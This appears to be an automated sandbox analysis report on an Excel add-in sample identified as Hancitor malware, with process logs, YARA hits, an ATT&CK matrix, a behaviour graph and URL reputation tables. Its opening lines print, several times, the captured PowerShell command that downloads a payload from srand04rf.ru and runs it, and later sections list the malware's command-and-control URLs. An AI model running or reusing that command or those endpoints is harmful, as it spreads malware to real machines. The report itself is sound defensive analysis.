        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062BBFB cpuid
        Source: C:\Users\Public\snd32sys.exeCode function: EnumSystemLocalesW,
        Source: C:\Users\Public\snd32sys.exeCode function: EnumSystemLocalesW,
        Source: C:\Users\Public\snd32sys.exeCode function: EnumSystemLocalesW,
        Source: C:\Users\Public\snd32sys.exeCode function: ___crtGetLocaleInfoEx,
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,
        Source: C:\Users\Public\snd32sys.exeCode function: EnumSystemLocalesW,
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
        Source: C:\Users\Public\snd32sys.exeCode function: EnumSystemLocalesW,
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,
        Source: C:\Users\Public\snd32sys.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,
        Source: C:\Users\Public\snd32sys.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Users\Public\snd32sys.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062B84D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00657096 _free,_free,_free,GetTimeZoneInformation,_free,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00611A80 GetVersion,wsprintfA,wsprintfA,

        Remote Access Functionality:

        barindex
        Yara detected HancitorShow sources
        Source: Yara matchFile source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumData Obfuscation1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Software Packing11Security Account ManagerSystem Information Discovery36SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationEncrypted Channel2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Masquerading111NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion21LSA SecretsSecurity Software Discovery21SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 445958 Sample: 0708_5355150121.xll Startdate: 08/07/2021 Architecture: WINDOWS Score: 100 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 8 other signatures 2->48 8 EXCEL.EXE 25 11 2->8         started        process3 dnsIp4 40 srand04rf.ru 8.211.241.0, 49724, 49748, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 8->40 28 C:\Users\Public\res32.hta, HTML 8->28 dropped 12 mshta.exe 19 8->12         started        file5 process6 process7 14 powershell.exe 14 12->14         started        signatures8 56 Drops PE files to the user root directory 14->56 58 Powershell drops PE file 14->58 17 snd32sys.exe 12 14->17         started        21 powershell.exe 15 17 14->21         started        24 conhost.exe 14->24         started        process9 dnsIp10 30 sudepallon.com 77.222.42.67, 49757, 49758, 49759 SWEB-ASRU Russian Federation 17->30 32 elb097307-934924932.us-east-1.elb.amazonaws.com 23.21.173.155, 49756, 80 AMAZON-AESUS United States 17->32 38 2 other IPs or domains 17->38 50 Detected unpacking (overwrites its own PE header) 17->50 52 May check the online IP address of the machine 17->52 54 Contains functionality to inject threads in other processes 17->54 34 srand04rf.ru 21->34 36 192.168.2.1 unknown unknown 21->36 26 C:\Users\Public\snd32sys.exe, PE32 21->26 dropped file11 signatures12

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        0708_5355150121.xll24%VirustotalBrowse
        0708_5355150121.xll17%ReversingLabsWin32.Trojan.Babar

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        16.2.snd32sys.exe.610000.0.unpack100%AviraTR/Dropper.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%Avira URL Cloudsafe
        https://cdn.entity.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
        http://srand04rf.ru/080%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        http://thentabecon.ru/8/forum.php0%Avira URL Cloudsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        http://anspossthrly.ru/8/forum.php0%Avira URL Cloudsafe
        http://srand04rf.ru0%Avira URL Cloudsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID0%Avira URL Cloudsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png80%Avira URL Cloudsafe
        http://srand04rf.ru/08.jpg0%Avira URL Cloudsafe
        https://contoso.com/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        elb097307-934924932.us-east-1.elb.amazonaws.com
        		23.21.173.155
        		truefalse
          		high
          srand04rf.ru
          		8.211.241.0
          		truetrue
            		unknown
            sudepallon.com
            		77.222.42.67
            		truetrue
              		unknown
              api.ipify.org
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://api.ipify.org/false
                  		high
                  http://thentabecon.ru/8/forum.phptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://anspossthrly.ru/8/forum.phptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://srand04rf.ru/08.jpgtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.diagnosticssdf.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                    		high
                    https://login.microsoftonline.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                      		high
                      https://shell.suite.office.com:1443F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                        		high
                        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                          		high
                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00708_5355150121.xlltrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://autodiscover-s.outlook.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                            		high
                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                              		high
                              https://cdn.entity.F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://api.addins.omex.office.net/appinfo/queryF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                		high
                                https://clients.config.office.net/user/v1.0/tenantassociationkeyF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                  		high
                                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                    		high
                                    https://powerlift.acompli.netF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://rpsticket.partnerservices.getmicrosoftkey.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://lookup.onenote.com/lookup/geolocation/v1F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                      		high
                                      https://cortana.aiF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                        		high
                                        https://cloudfiles.onenote.com/upload.aspxF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                          		high
                                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                            		high
                                            https://entitlement.diagnosticssdf.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                              		high
                                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                		high
                                                https://api.aadrm.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://ofcrecsvcapi-int.azurewebsites.net/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                  		high
                                                  https://api.microsoftstream.com/api/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                    		high
                                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                      		high
                                                      https://cr.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpfalse
                                                          		high
